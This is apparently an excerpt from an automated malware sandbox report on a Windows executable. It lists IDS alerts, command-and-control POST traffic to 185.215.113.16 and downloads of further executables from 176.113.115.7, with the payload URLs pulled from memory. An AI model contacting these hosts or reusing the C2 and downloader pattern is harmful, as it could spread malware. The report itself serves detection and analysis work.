Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 46 41 34 34 34 43 46 46 33 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFFA444CFF3FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 46 41 34 34 34 43 46 46 33 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFFA444CFF3FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 46 41 34 34 34 43 46 46 33 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFFA444CFF3FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 46 41 34 34 34 43 46 46 33 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFFA444CFF3FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 176.113.115.7 176.113.115.7
Source: Joe Sandbox View	IP Address: 176.113.115.7 176.113.115.7
Source: Joe Sandbox View	IP Address: 176.113.115.6 176.113.115.6
Source: Joe Sandbox View	IP Address: 176.113.115.6 176.113.115.6

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: SELECTELRU SELECTELRU
Source: Joe Sandbox View	ASN Name: SELECTELRU SELECTELRU
Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49718 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49788 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49812 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49828 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49797 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49834 -> 172.67.172.183:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49839 -> 172.67.172.183:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49847 -> 149.154.167.99:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49845 -> 172.67.172.183:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49855 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49858 -> 172.67.172.183:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49841 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49860 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49862 -> 172.67.172.183:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49849 -> 172.67.172.183:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49863 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49866 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49873 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49869 -> 172.67.172.183:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49879 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49850 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49883 -> 104.21.32.1:443

Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Source: unknown

DNS traffic detected: query: wxayfarer.live replaycode: Name error (3)

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7

Source: C:\Users\user\Desktop\SUAosT64HD.exe

Code function: 1_2_004ADFD0 recv,recv,recv,recv,

1_2_004ADFD0

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Mar 2025 15:56:53 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 28 Mar 2025 12:59:06 GMTETag: "273632-63166a2adfa80"Accept-Ranges: bytesContent-Length: 2569778Content-Type: application/zipData Raw: 50 4b 03 04 14 03 00 00 08 00 2a 05 59 5a 03 11 33 3f 32 91 00 00 08 29 01 00 0d 00 00 00 69 6e 73 74 61 6c 6c 65 72 2e 65 78 65 d4 5c 79 7c 14 f5 15 df d9 5c 1b 48 98 00 89 c4 03 09 1a 5a e2 81 89 17 ac 82 66 c8 ae ce ca 46 a3 80 a2 22 52 03 11 5b ab 08 bb 8a 8a 90 b8 bb 9a 71 5d 48 d5 56 5b 6d 6d 6b ad d5 da 53 0b 01 54 76 13 c8 01 1e 01 15 02 88 05 54 9c 21 02 e1 30 07 84 6c bf ef fd 66 77 93 80 3d fe 6c 3e b0 33 f3 3b de ef fd de f5 7b ef fd 7e 33 a5 b7 d5 58 92 2c 16 4b 32 fe 47 a3 16 4b ad 45 fc 15 5b fe f3 5f 25 fe 0f 19 b5 7a 88 e5 ed f4 0f 46 d7 4a ee 0f 46 4f 9b 77 cf c2 bc f9 0b ee bf 7b c1 0f 7e 9c 57 fe 83 fb ee bb df 93 77 d7 dc bc 05 de fb f2 ee b9 2f cf 71 c3 d4 bc 1f df 3f 67 ee b8 cc cc 41 f9 26 8c 32 a7 c5 32 e7 89 c1 16 d7 f4 17 2a 2c 87 2d 96 72 94 b5 5b be 67 1d 6c b5 9e 67 f9 2d 1e 0e e0 7f 06 ca 86 e3 9a 25 50 93 2c e6 bd 95 f0 16 7f 29 78 10 48 49 5c 38 76 8c 15 f3 9a 8d 87 3c 14 8a f6 b1 9b c4 25 7e 9b f8 2b 94 2c 7f cd c4 15 5d 75 06 2e 59 8a 53 2c 96 56 5c 0b c7 e2 71 be 64 a9 fe 37 34 f9 f5 2e 8c 7d 8a f2 b2 4b 00 cf fa dd fd c6 79 e6 2e f2 10 fa bf 36 11 fa 2d 33 a5 df df 6c fc 1b 37 e7 07 9e 1f 30 5a f8 1f c6 7f 82 f9 fb fe ed 8a 51 33 6e 81 68 58 78 0e 0a 5a f0 9f 08 fe 87 93 da 15 8f 9b cf ed 30 47 13 68 2a 2e ef 9f a2 dd 22 73 60 6a 97 65 b6 db 7c 8a 76 77 2d 5c 48 f7 35 83 f1 93 27 9d 5a 6e 08 bf 7b 18 9e a0 75 21 da 0d c1 b5 f5 14 f3 28 b9 69 1a cf 5d 70 5e cc 77 ef 29 da 79 ee 5d 18 e7 65 99 d9 4e 3f 15 5d 16 2e 80 8c 09 de ce 36 e7 b1 ef 14 f3 58 30 f7 de fb d1 90 79 3d df 84 d7 7e 52 bb c9 96 ff f3 bf fa 8a 8a 71 f2 28 3f df cb a3 8a 2d aa ef 9b b1 6a 30 25 00 56 14 35 37 b2 94 e1 f1 09 3c c6 1f b4 be 0f 9f 6d b5 58 2a aa 26 94 de e6 95 d5 f2 b2 89 aa d4 52 35 81 74 da 53 81 ca 8b d0 52 cb 7c 55 96 2c 41 4b 20 ec 29 59 c5 4c 79 7d 09 91 ff 41 ea 9e 73 02 2d 82 c3 b4 ac d8 f3 07 b1 e7 39 59 0c fe 0e 80 f7 4d 90 3c 65 45 61 d5 b7 6e 6c 7d cd 2a 89 40 54 00 44 db 1a c2 57 5e 59 96 5b 51 75 6c b0 e4 71 d2 c5 ea ad f6 d5 d2 6c 86 c8 4f 3c 1a 8d 46 83 35 5d 16 9a 49 60 b3 fc d3 88 71 0f 4a e4 51 95 16 46 3d f3 37 ad 80 b4 78 04 aa 05 6c 79 94 03 83 2d f2 a0 6b 31 1a 3a 82 95 3a f7 75 06 c2 d4 f9 02 94 55 d4 80 3e 13 80 97 17 7d dd a1 94 2d 43 24 8b 1a ca d9 ca 97 cc d6 21 34 51 2d e5 4d 5c d1 66 28 da 38 82 36 35 94 f2 22 15 68 8e fc 3c fd 97 8f 41 35 30 da 84 7a 13 0f 65 da f4 5b 6e 9e 0a a8 Data Ascii: PK*YZ3?2)installer.exe\y|\HZfF"R[q]HV[mmkSTvT!0lfw=l>3;{~3X,K2GKE[_%zFJFOw{~Ww/q?gA&22*,-r[glg-%P,)xHI\8v<%~+,]u.YS,V\qd74.}Ky.6-

Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /files/newdef/apple.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /files/7001656225/Rm3cVPI.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /files/6150344932/39pazbF.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /files/5876083921/Or1ARiR.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /files/7708303768/xZRvIQ5.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /files/7708303768/xZRvIQ5.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /files/martin1/martin.zip HTTP/1.1Host: 176.113.115.7

Source: unknown

HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: rapes.exe, 0000000B.00000002.2565136945.0000000000EAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpA
Source: rapes.exe, 0000000B.00000002.2565136945.0000000000EAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpT
Source: rapes.exe, 0000000B.00000002.2565136945.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/5876083921/Or1ARiR.exe
Source: rapes.exe, 0000000B.00000002.2565136945.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/6150344932/39pazbF.exe
Source: rapes.exe, 0000000B.00000002.2565136945.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/7001656225/Rm3cVPI.exe
Source: rapes.exe, 0000000B.00000002.2565136945.0000000000EAE000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.2565136945.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/7708303768/xZRvIQ5.exe
Source: rapes.exe, 0000000B.00000002.2565136945.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.2565136945.0000000000E5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/martin1/martin.zip
Source: rapes.exe, 0000000B.00000002.2565136945.0000000000E5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/martin1/martin.zip3F
Source: rapes.exe, 0000000B.00000002.2565136945.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/martin1/martin.zipmageres.dll
Source: rapes.exe, 0000000B.00000002.2565136945.0000000000E50000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.2565136945.0000000000E99000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/newdef/apple.exe
Source: rapes.exe, 0000000B.00000002.2565136945.0000000000E50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/newdef/apple.exeded
Source: rapes.exe, 0000000B.00000002.2565136945.0000000000E99000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/newdef/apple.exeh
Source: axplong.exe, 00000002.00000002.2568047704.0000000000F98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/mine/random.exe
Source: axplong.exe, 00000002.00000002.2568047704.0000000000F98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/mine/random.exe9c5e67e.
Source: axplong.exe, 00000002.00000002.2568047704.0000000000F98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/mine/random.exe9c5e67ee827
Source: axplong.exe, 00000002.00000002.2568047704.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/
Source: axplong.exe, 00000002.00000002.2568047704.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/15.113.16/ferences.SourceAumidI_
Source: axplong.exe, 00000002.00000002.2568047704.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/615999F290D087244277E3
Source: axplong.exe, 00000002.00000002.2568047704.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/6165
Source: axplong.exe, 00000002.00000002.2568047704.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/B
Source: axplong.exe, 00000002.00000002.2568047704.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000002.2568047704.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
Source: axplong.exe, 00000002.00000002.2568047704.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php#w
Source: axplong.exe, 00000002.00000002.2568047704.0000000000F98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php)
Source: axplong.exe, 00000002.00000002.2568047704.0000000000F98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php2001
Source: axplong.exe, 00000002.00000002.2568047704.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php7w
Source: axplong.exe, 00000002.00000002.2568047704.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpOw
Source: axplong.exe, 00000002.00000002.2568047704.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpV
Source: axplong.exe, 00000002.00000002.2568047704.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php_
Source: axplong.exe, 00000002.00000002.2568047704.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpes
Source: axplong.exe, 00000002.00000002.2568047704.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpkw
Source: axplong.exe, 00000002.00000002.2568047704.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded
Source: axplong.exe, 00000002.00000002.2568047704.0000000000F98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpnu
Source: axplong.exe, 00000002.00000002.2568047704.0000000000F98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpp(
Source: axplong.exe, 00000002.00000002.2568047704.0000000000F98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpu
Source: axplong.exe, 00000002.00000002.2568047704.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpy1mb3JtLXVybGVuY29kZWQ=wz
Source: axplong.exe, 00000002.00000002.2568047704.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpzRm4SJjISZA3JNjZ64n0LR=t
Source: axplong.exe, 00000002.00000002.2568047704.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/System32
Source: axplong.exe, 00000002.00000002.2568047704.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/lfons
Source: axplong.exe, 00000002.00000002.2568047704.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/onAp
Source: axplong.exe, 00000002.00000002.2568047704.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/ta
Source: rapes.exe, 0000000B.00000002.2565136945.0000000000F25000.00000004.00000020.00020000.00000000.sdmp, xZRvIQ5.exe.11.dr, xZRvIQ5[1].exe.11.dr	String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: rapes.exe, 0000000B.00000002.2565136945.0000000000F25000.00000004.00000020.00020000.00000000.sdmp, xZRvIQ5.exe.11.dr, xZRvIQ5[1].exe.11.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: rapes.exe, 0000000B.00000002.2565136945.0000000000F25000.00000004.00000020.00020000.00000000.sdmp, xZRvIQ5.exe.11.dr, xZRvIQ5[1].exe.11.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: rapes.exe, 0000000B.00000002.2565136945.0000000000F25000.00000004.00000020.00020000.00000000.sdmp, xZRvIQ5.exe.11.dr, xZRvIQ5[1].exe.11.dr	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: rapes.exe, 0000000B.00000002.2565136945.0000000000F25000.00000004.00000020.00020000.00000000.sdmp, xZRvIQ5.exe.11.dr, xZRvIQ5[1].exe.11.dr	String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: rapes.exe, 0000000B.00000002.2565136945.0000000000F25000.00000004.00000020.00020000.00000000.sdmp, xZRvIQ5.exe.11.dr, xZRvIQ5[1].exe.11.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: rapes.exe, 0000000B.00000002.2565136945.0000000000F25000.00000004.00000020.00020000.00000000.sdmp, xZRvIQ5.exe.11.dr, xZRvIQ5[1].exe.11.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: rapes.exe, 0000000B.00000002.2565136945.0000000000F25000.00000004.00000020.00020000.00000000.sdmp, xZRvIQ5.exe.11.dr, xZRvIQ5[1].exe.11.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: rapes.exe, 0000000B.00000002.2565136945.0000000000F25000.00000004.00000020.00020000.00000000.sdmp, xZRvIQ5.exe.11.dr, xZRvIQ5[1].exe.11.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: rapes.exe, 0000000B.00000002.2565136945.0000000000F25000.00000004.00000020.00020000.00000000.sdmp, xZRvIQ5.exe.11.dr, xZRvIQ5[1].exe.11.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: rapes.exe, 0000000B.00000002.2565136945.0000000000F25000.00000004.00000020.00020000.00000000.sdmp, xZRvIQ5.exe.11.dr, xZRvIQ5[1].exe.11.dr	String found in binary or memory: http://ocsp.entrust.net02
Source: rapes.exe, 0000000B.00000002.2565136945.0000000000F25000.00000004.00000020.00020000.00000000.sdmp, xZRvIQ5.exe.11.dr, xZRvIQ5[1].exe.11.dr	String found in binary or memory: http://ocsp.entrust.net03
Source: ssisd.sys.14.dr	String found in binary or memory: http://sf.symcb.com/sf.crl0a
Source: ssisd.sys.14.dr	String found in binary or memory: http://sf.symcb.com/sf.crt0
Source: ssisd.sys.14.dr	String found in binary or memory: http://sf.symcd.com0&
Source: rapes.exe, 0000000B.00000002.2565136945.0000000000F25000.00000004.00000020.00020000.00000000.sdmp, xZRvIQ5.exe.11.dr, xZRvIQ5[1].exe.11.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: rapes.exe, 0000000B.00000002.2565136945.0000000000F25000.00000004.00000020.00020000.00000000.sdmp, xZRvIQ5.exe.11.dr, xZRvIQ5[1].exe.11.dr	String found in binary or memory: http://www.entrust.net/rpa03
Source: ssisd.sys.14.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: ssisd.sys.14.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: rapes.exe, 0000000B.00000002.2565136945.0000000000F25000.00000004.00000020.00020000.00000000.sdmp, xZRvIQ5.exe.11.dr, xZRvIQ5[1].exe.11.dr	String found in binary or memory: https://www.entrust.net/rpa0

System Summary

PE file contains section with special chars

